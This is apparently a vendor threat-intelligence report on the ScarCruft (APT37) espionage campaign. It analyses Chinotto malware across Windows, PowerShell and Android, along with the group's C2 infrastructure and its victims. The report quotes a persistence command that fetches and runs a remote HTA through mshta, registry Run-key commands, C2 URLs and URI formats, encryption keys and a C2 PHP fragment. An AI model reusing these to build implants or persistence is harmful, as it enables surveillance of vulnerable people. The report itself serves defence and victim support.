The ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor we first reported in 2016. ScarCruft is known to target North Korean defectors, journalists who cover North Korea-related news and government organizations related to the Korean Peninsula, between others. Recently, we were approached by a news organization with a request for technical assistance during their cybersecurity investigations. As a result, we had an opportunity to perform a deeper investigation on a host compromised by ScarCruft. The victim was infected by PowerShell malware and we discovered evidence that the actor had already stolen data from the victim and had been surveilling this victim for several months. The actor also attempted to send spear-phishing emails to the victims’ associates working in businesses related to North Korea by using stolen login credentials.
Based on the findings from the compromised machine, we discovered additional malware. The actor utilized three types of malware with similar functionalities: versions implemented in PowerShell, Windows executables and Android applications. Although intended for different platforms, they share a similar command and control scheme based on HTTP communication. Therefore, the malware operators can control the whole malware family through one set of command and control scripts.
We were working closely with a local CERT to investigate the attacker’s command and control infrastructure and as a result of this, we were able better understand how it works. The APT operator controls the malware using a PHP script on the compromised web server and controls the implants based on the HTTP parameters. We were also able to acquire several log files from the compromised servers. Based on said files, we identified additional victims in South Korea and compromised web servers that have been utilized by ScarCruft since early 2021. Additionally, we discovered older variants of the malware, delivered via HWP documents, dating back to mid-2020.
More information about ScarCruft is available to customers of Kaspersky Intelligence Reporting. Contact: email@example.com
Before spear-phishing a potential victim and sending a malicious document, the actor contacted an acquaintance of the victim using the victim’s stolen Facebook account. The actor already knew that the potential target ran a business related to North Korea and asked about its current status. After a conversation on social media, the actor sent a spear-phishing email to the potential victim using a stolen email account. The actor leveraged their attacks using stolen login credentials, such as Facebook and personal email accounts, and thereby showed a high level of sophistication.
After a Facebook conversation, the potential target received a spear-phishing email from the actor. It contains a password-protected RAR archive with the password shown in the email body. The RAR file contains a malicious Word document.
Spear-phishing email and decoy
This document contains a lure related to North Korea.
|MD5||File name||Modified time||Author||Last saved user|
|baa9b34f152076ecc4e01e35ecc2de18||북한의 최근 정세와 우리의 안보.doc
(North Korea’s latest situation and our national security)
This document contains a malicious macro and a payload for a multi-stage infection process. The first stage’s macro contains obfuscated strings and then spawns another macro as a second stage.
The first stage macro checks for the presence of a Kaspersky security solution on the victim’s machine by trying the following file paths:
- C:Windowsavp.exe # Kaspersky AV
- C:WindowsKavsvc.exe # Kaspersky AV
- C:Windowsclisve.exe # Unknown
If a Kaspersky security solution is indeed installed on the system, it enables trust access for Visual Basic Application (VBA) by setting the following registry key to ‘1’:
By doing so, Microsoft Office will trust all macros and run any code without showing a security warning or requiring the user’s permission. Next, the macro creates a mutex named ‘sensiblemtv16n’ and opens the malicious file once more. Thanks to the “trust all macros” setting, the macro will be executed automatically.
If no Kaspersky security software is installed, the macro directly proceeds to decrypt the next stage’s payload. In order to achieve this, it uses a variation of a substitution method. The script compares the given encrypted string with a second string to get an index of matched characters. Next, it receives a decrypted character with an index acquired from the first string.
- First string: BU+13r7JX9A)dwxvD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V&tC,uYz=Z0RS8aM4Fqn
- Second string: v&tC,uYz=Z0RS8aM4FqnD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V7JX9A)dwxBU+13r
The decrypted second stage Visual Basic Application (VBA) contains shellcode as a hex string. This script is responsible for injecting the shellcode into the process notepad.exe.
Shellcode in the second stage VBA
The shellcode contains the URL to fetch the next stage payload. After fetching the payload, the shellcode decrypts it with trivial single-byte XOR decryption. Unfortunately, we weren’t able to gather the final payload when we investigated this sample.
The payload’s download path is:
As a result of our efforts in helping the victim with the analysis, we had a chance to investigate the host of the owner who sent the spear-phishing email. When we first checked the process list, there was a suspicious PowerShell process running with a rather suspicious parameter.
This PowerShell command was registered via the Run registry key as a mechanism for persistence:
- Registry path: HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun – ONEGO
c:windowssystem32cmd.exe /c PowerShell.exe –WindowStyle hidden –NoLogo –NonInteractive –ep bypass ping –n 1 –w 300000 126.96.36.199 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html
This registry key causes the HTML Application (HTA) file to get fetched and executed by the mshta.exe process every time the system is booted. The fetched ‘1.html’ is an HTML Application (.hta) file that contains Visual Basic Script (VBS), which eventually executes PowerShell commands.
The PowerShell script offers simple backdoor functionalities and continuously queries the C2 server with HTTP POST requests containing several parameters. At first, it sends a beacon to the C2 server with the host name:
Next, it attempts to download commands from the C2 server with the following format:
If the HTTP response from the C2 server is 200, it checks the response data and executes the delivered commands.
|ref:||Send a beacon to the C2 server:
HTTP request: ?type=hello&direction=send&id=
|cmd:||If the command data includes ‘start’, execute the given command with cmd.exe and send base64 encoded ‘OK’ with the following POST format. Otherwise, it executes the given command, redirecting the result to the result file (%APPDATA%desktop.dat), and sends the contents of the file after base64 encoding.
HTTP request: ?type=result&direction=send&id=
We discovered additional malware, tools and stolen files from the victim’s host. Due to limited access to the compromised host, we were unable to figure out the initial infection vector. However, we assess this host was compromised on March 22, 2021, based on the timestamp of the suspicious files. One characteristic of the malware we discovered from the victim is the writing of execution results from commands to the file “%appdata%desktop.dat”. According to the Master File Table (MFT) information, this file was created the same day, March 22, 2021, and the last modification time is on September 8, 2021, which means this file was used until just before our investigation.
Using the additional tools, the malware operator collected sensitive information from this victim, although we can’t assess exactly how much data was exfiltrated and what kind of data was stolen. Based on the timestamp of the folders and files created by the malware, the actor collected and exfiltrated files as early as August 2021. The log files with the .dat extension are encrypted, but can be decrypted with the one-byte XOR key 0x75. These log files contain the uploading history. We found two log files and each of them contains slightly different logs. The ‘B14yNKWdROad6DDeFxkxPZpsUmb.dat’ file contains zipping and uploading of the folder bearing the same name. The log file presents the process as: “Zip Dir Start > Up Init > Up Start > Up File Succeed > Zip Dir Succeed”. According to the log file, the malware operator collected something from the infected system in this folder and uploaded it after archiving.
File archiving and uploading log
The other log file, named “s5gRAEs70xTHkAdUjl_DY1fD.dat”, also contains a file uploading history, except for file zipping messages. It processes each file with this procedure: “Up Init > Up Start > Up File Succeed”.
File uploading log
Based on what we found from this victim, we can confirm that the malware operator collected screenshots and exfiltrated them between August 6, 2021 and September 8, 2021. Based on what we found out from the victim, we can summarize the whole infection timeline. We suspect this host was compromised on March 22, 2021. After the initial infection, the actor attempted to implant additional malware, but an error occurred that led to the crash of the malware. The malware operator later delivered the Chinotto malware in August 2021 and probably started to exfiltrate sensitive data from the victim.
Timeline of the attack on the victim
Windows executable Chinotto
As a result of the host investigation, we discovered a malicious Windows executable and found additional malware variants from VirusTotal and our own sample collection. One of the Windows executables contains a build path and the malware author appears to call the malware “Chinotto“.
The technical specifications in this analysis are based on the Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) we discovered from the host investigation. One of the characteristics of this malware is that it contains a lot of garbage code to impede analysis. During runtime, the malware copies unused data to the allocated buffer before copying the real value; or allocates an unused buffer, filling it with meaningless data, and never uses it.
It also restores functional strings such as C2 addresses and debugging messages to the stack at runtime. The malware creates a mutex and fetches the C2 addresses, which are different for each sample we discovered:
C2 address: hxxp://luminix.openhaja[.]com/bbs/data/proc1/proc.php
In order to generate the identification value of the victim, the malware acquires both computer and user name and combines them in the format ‘%computer name%_%user name%’. Next, it encrypts the acquired string with the XOR key ‘YFXAWSAEAXee12D4’ and encodes it with base64.
The backdoor continuously queries the C2 server, awaiting commands from the malware operator. We observed an early version of Chinotto malware (MD5 55afe67b0cd4a01f3a9a6621c26b1a49) which, while it also follows this simple principle, uses a hard-coded backdoor command ‘scap’. This means this specific sample is only designed for exfiltrating the victim’s screenshot.
The Chinotto malware shows fully fledged capabilities to control and exfiltrate sensitive information from the victims.
|ref:||Send beacon to the C2 server:
|cmd:||Execute Windows commands and save the result to the %APPDATA%s5gRAEs70xTHkAdUjl_DY1f.dat file after encrypting with a one-byte XOR key|
|down:||Download file from the remote server|
|state:||Upload log file (s5gRAEs70xTHkAdUjl_DY1fD.dat)|
|regstart:||Copy current malware to the CSIDL_COMMON_DOCUMENTS folder and execute command to register file to run registry:
“reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v a2McCq /t REG_SZ /d %s /f”
|cleartemp:||Remove files from folder “%APPDATA%s5gRAEs70xTHkAdUjl_DY1fD”|
|updir:||Archive directory and upload it. Archive is XOR encoded using the same key used when creating the identification value: ‘YFXAWSAEAXee12D4’|
|init:||Collect files with following extensions from the paths CSIDL_DESKTOP, CSIDL_PERSONAL(CSIDL_MYDOCUMENTS), CSIDL_MYMUSIC, CSIDL_MYVIDEO. Downloads and upload them to C2 server:
|scap:||Take a screenshot, save it to the folder “%appdata%s5gRAEs70xTHkAdUjl_DY1fD” in an archived format. The file to store the screenshot has an ‘e_‘ prefix and 10 randomly generated characters as a filename. When uploading the screenshot file, it uses ‘wrpdwRwsFEse’ as the filename|
|run:||Run Windows commands with ShellExecuteW API|
|chdec:||Download an encrypted file and decrypt it via CryptUnprotectData API|
|update:||Download updated malware and register it:
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v m4cVWKDsa9WxAWr41iaNGR /t REG_SZ /d %s /f
|wait:||Sleep for 30 minutes|
|wakeup:||Wake up after 2.5 seconds|
Another malware sample (MD5 04ddb77e44ac13c78d6cb304d71e2b86) that demonstrated a slight difference during runtime was discovered from the same victim. This is the same fully featured backdoor, but it loads the backdoor command using a different scheme. The malware checks for the existence of a ‘*.zbpiz’ file in the same folder. If it exists, it loads the file’s content and uses it as a backdoor command after decrypting. The malware authors keep changing the capabilities of the malware to evade detection and create custom variants depending on the victim’s scenario.
In addition, there are different Windows executable variants of the Chinotto malware. Apart from the conventional Chinotto malware mentioned above, a different variant contains an embedded PowerShell script. The spawned PowerShell command has similar functionality to the PowerShell we found from the victim. However, it contains additional backdoor commands, such as uploading and downloading capabilities. Based on the build timestamp of the malware, we assess that the malware author used the PowerShell embedded version from mid-2019 to mid-2020 and started to use the malicious, PowerShell-less Windows executable from the end of 2020 onward.
Based on the C2 communication pattern, we discovered an Android application version of Chinotto malware (MD5 56f3d2bcf67cf9f7b7d16ce8a5f8140a). This malicious APK requests excessive permissions according to the AndroidManifest.xml file. To achieve its purpose of spying on the user, these apps ask users to enable various sorts of permissions. Granting these permissions allows the apps to collect sensitive information, including contacts, messages, call logs, device information and audio recordings. Each sample has a different package name, with the analyzed sample bearing “com.secure.protect” as a package name.
The malware sends its unique device ID in the same format as the Windows executable version of Chinotto.
Beacon URI pattern: [C2 url]?type=hello&direction=send&id=[Unique Device ID]
Next, it receives a command after the following HTTP request:
Retrieve commands: [C2 url]?type=command&direction=receive&id=[Unique Device ID]
If the delivered data from the C2 server is not “ERROR” or “Fail”, the malware starts to carry out backdoor operations.
|ref:||?type=hello&direction=send&id=||Send the same beacon request to the C2 server|
|down||?type=file&direction=send&id=||Upload the temporary file (/sdcard/.temp-file.dat) to the C2 server and remove it from local storage.|
|UriP||?type=file&direction=send&id=||Save temporary file path to the result file (/sdcard/result-file.dat) and upload the temporary file.|
|After sending a beacon, collect the following information to the /icloud/tmp-web path:
Upload collected file after archiving. The archived file is encrypted by AES with the key “3399CEFC3326EEFF”.
|UploadFile||?type=file&direction=send&id=||Execute command ‘cd /sdcard;ls -alR’, save the result to the temporary file (/sdcard/.temp-file.dat) and upload it. Upload all thumbnails and photos after encrypting via AES and the key “3399CEFC3326EEFF”.|
|ETC||?type=file&direction=send&id=||Execute command saving the result to the result file (/sdcard/result-file.dat)
and upload the result
We found that the actor had an interest in a more specific file list in one variant (MD5 cba17c78b84d1e440722178a97886bb7). The ‘UploadFile’ command of this variant uploads specific files to the C2 server. The AMR file is an audio file generally used for recording phone calls. Also, Huawei cloud and Tencent services are two of the targets. To surveil the victim, the list includes target folders as well as /Camera, /Recordings, /KakaoTalk (a renowned Korean messenger), /문건(documents), /사진(pictures) and /좋은글(good articles).
Targeted files and folders
To sum up, the actor targeted victims with a probable spear-phishing attack for Windows systems and smishing for Android systems. The actor leverages Windows executable versions and PowerShell versions to control Windows systems. We may presume that if a victim’s host and mobile are infected at the same time, the malware operator is able to overcome two-factor authentication by stealing SMS messages from the mobile phone. After a backdoor operation with a fully featured backdoor, the operator is able to steal any information they are interested in. Using the stolen information, the actor further leverages their attacks. For example, the group attempts to infect additional valuable hosts and contact potential victims using stolen social media accounts or email accounts.
Older malicious HWP documents
The threat actor behind this campaign delivered the same malware with a malicious HWP file. At that time, lures related to COVID-19 and credential access were used.
|HWP hash||HWP file name||Dropped payload hash|
|f17502d3e12615b0fa8868472a4eabfb||코로나19 재감염 사례-백신 무용지물.hwp
(Covid-19 reinfection case-Useless vaccine.hwp)
(Visual Basic Script)
|c155f49f0a9042d6df68fb593968e110||계정기능 제한 안내.hwp
(Notice of limitation of account.hwp)
The Visual Basic Script created by the first HWP file (MD5 f17502d3e12615b0fa8868472a4eabfb) has similar functionalities to the Chinotto malware. It also uses the same HTTP communication pattern. The second payload dropped from the malicious HWP is a Windows executable executing an embedded PowerShell script with the same functionalities. These discoveries reveal related activity dating back to at least mid-2020.
In this campaign, the actor relied solely on compromised web servers, mostly located in South Korea. During this research we worked closely with the local CERT to take down the attacker’s infrastructure and had a chance to look into one of the scripts on the C2 servers that control the Chinotto malware. The C2 script (named “do.php”) uses several predefined files to save the client’s status (shakest) and commands (comcmd). Also, it parses several parameters (id, type, direction, data) delivered by the HTTP request from the implant:
$btid = $_GET[‘id’];
$type = $_GET[‘type’];
$direction = $_GET[‘direction’];
$data = $_GET[‘data’];
$comname = $btid.””;
$comresname = $comname . “-result”;
$type = “”; # ‘type’ parameter
$shakename = “shakest”; # Save client status
$comcmdname = “comcmd”; # Save commands
$btid = “”; # Client unique ID
$direction = “”; # ‘direction’ parameter
$data = “”; # ‘data’ parameter
$btid = $_GET[‘id’];
$type = $_GET[‘type’];
$direction = $_GET[‘direction’];
$data = $_GET[‘data’];
$comname = $btid.“”;
$comresname = $comname . “-result”;
In order to control the client, the C2 script uses HTTP parameters. First, it checks the value of the ‘type’ parameter. The ‘type’ parameter carries four values: hello, command, result, and file.
|Value of ‘type’ param||Description|
|hello||Report and control the client status|
|command||Hold the command from the operator or retrieve the command from the client|
|result||Upload the command execution result or retrieve the command|
|file||Upload file to the C2 server|
When the script receives the ‘type=hello’ parameter, it checks the value of ‘direction’. In this routine, the script checks the status of the client. The malware operator saves the client status to a specific file, the ‘shakest’ file in this case. If the ‘send’ value is being received, the client status is set to ‘ON’. If ‘receive’ is set as well, the client’s status log file is sent (likely in order to send the status of clients to the malware operator). The ‘refresh’ value is for setting all clients to ‘OFF’ and ‘release’ is used to initialize the command file. The client just replies ‘OK’.
In order to manage the implant’s commands, the C2 script handles several additional parameters. If the ‘type=command’ alongside ‘direction=receive’ is set, it issues a request from the client to retrieve a command.
There are two kinds of command files: common commands like an initial command or commands sent to all clients, and individual commands for a specific client. If an individual command exists for a client, it delivers it. Otherwise, the client is sent a common command. If the ‘direction’ parameter is set to ‘send’, the request is coming from the malware operator in order to save the sent command in the C2 server. Using this request, the operator can set two commands files: common command or individual command. If the ‘botid’ parameter contains ‘cli’, it means this request is for setting a common command file. If the ‘data’ parameter contains ‘refclear:’, the common command file gets initialized. Otherwise, the ‘data’ value is saved to the common command file. If ‘botid’ is not ‘cli’, it means this request is directed to an individual command file. The process of saving the individual command file is the same as the process used for saving the common command.
When uploading command execution results coming from the implant, the script sets the ‘type’ parameter to ‘result’. If the ‘direction’ parameter equals ‘send’, it saves the value of the ‘data’ parameter to the individual result file: “[botid]-result“. The ‘receive’ value of the ‘direction’ parameter means retrieving the individual result file. The script then sends the result file to the operator after encoding it with base64.
The last possible ‘type’ command is ‘file’. This value is used for exfiltrating files from the victim. If a file upload succeeds, the script sends the message ‘SEND SUCCESS’. Otherwise, it sends ‘There was an error uploading the file, please try again!’.
We discovered that the malware operator used a separate webpage to monitor and control the victims. From several compromised C2 servers we see a control page carrying a ‘control.php’ file name.
Control page from this case
The control page shows a simple structure. The operator can see a list of infected hosts in the left panel with the corresponding status “ON” or “OFF”. Based on this information, the operator is able to issue a command using the right panel and watch the result from the client.
We began this research by providing support to human rights activists and defectors from North Korea against an actor seeking to surveil and track them.
Additionally, we discovered further victims we couldn’t profile from analyzing the C2 servers. From analyzing the attacker’s infrastructure, we found 75 client connections between January 2021 and February 2021. Most IP addresses seem to be Tor or VPN connections, which are likely to be either from researchers or the malware operators.
Analyzing other C2 servers, we found more information about possible additional victims. Excluding connections coming from Tor, there are only connections coming from South Korea. Based on the IP addresses, we could distinguish four different suspected victims located in South Korea, and determine their operating system and browser used based on user-agent information:
Victim A connected to the C2 server from July 16 to September 5 and has outdated versions of Windows OS and Internet Explorer. Victim B connected to this server on September 4 and operates Windows 8 and Internet Explorer 10. While we were investigating the C2 server, Victim D kept connecting to it, using Windows 10 with Chrome version 78.
Timeline of victims
To sum up, this campaign is targeting entities in South Korea, which is a top point of interest for ScarCruft. Based on our findings, we also assume that the threat actor targeted individuals rather than specific companies or organizations.
We discovered several code overlaps with old ScarCruft malware named POORWEB. At first, when Chinotto malware uploads the file to the C2 server, it uses the HTTP POST request with a boundary generated with a random function. When Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) generates a boundary value, it executes the random() function twice and concatenates each value. The generation process is not exactly the same, but it utilizes a similar scheme as the old POORWEB malware (MD5 97b35c34d600088e2a281c3874035f59).
HTTP boundary generation routine
Moreover, there is additional code overlap with Document Stealer malware (MD5 cff9d2f8dae891bd5549bde869fe8b7a) that was previously utilized with POORWEB malware. When the Chinotto malware checks the response from the C2 server, it checks whether the response is ‘HTTP/1.1 200 OK’ and not ‘error’. This Document Stealer malware also has the same routine to check responses from the C2 server.
C2 response check routine
Apart from code similarity, historically, ScarCruft group is known to surveil individuals related to North Korea such as journalists, defectors, diplomats and government employees. The target of this attack is within the same scope as previous ScarCruft group campaigns. Based on the victimology and several code overlaps, we assess with medium confidence that this cyber-espionage operation is related to the ScarCruft group.
Many journalists, defectors and human rights activists are targets of sophisticated cyberattacks. Unlike corporations, these targets typically don’t have sufficient tools to protect against and respond to highly skilled surveillance attacks. One of the purposes of our team is to help individuals targeted by APT groups. This research stemmed from this kind of endeavor. Our collaboration with the local CERT allowed us to gain a unique look into ScarCruft’s infrastructure setup and allowed us to discover many technical details.
Using these findings, we found additional Android variants of the same malware, which has been invaluable in understanding and tracking ScarCruft TTPs. Moreover, while hunting for related activity, we uncovered an older set of activity dating back to mid-2020, possibly indicating that ScarCruft operations against this set of individuals have been operating for a longer period of time.
Indicators of compromise
Windows executable Chinotto
PowerShell embedded Chinotto
Android application Chinotto
Payload hosting URLs
Command and control server
MITRE ATT&CK mapping
|Resource Development||T1584.006||Compromise Infrastructure: Web Services|
|Initial Access||T1566.001||Phishing: Spear-phishing Attachment|
|Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: Visual Basic
|Persistence||T1547.001||Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder|
|Deobfuscate/Decode Files or Information
Masquerading: Match Legitimate Name or Location
|System Owner/User Discovery
System Information Discovery
Archive Collected Data: Archive via Library
|Command and Control||T1071.001
|Application Layer Protocol: Web Protocols
Encrypted Channel: Symmetric Cryptography
|Exfiltration||T1041||Exfiltration Over C2 Channel|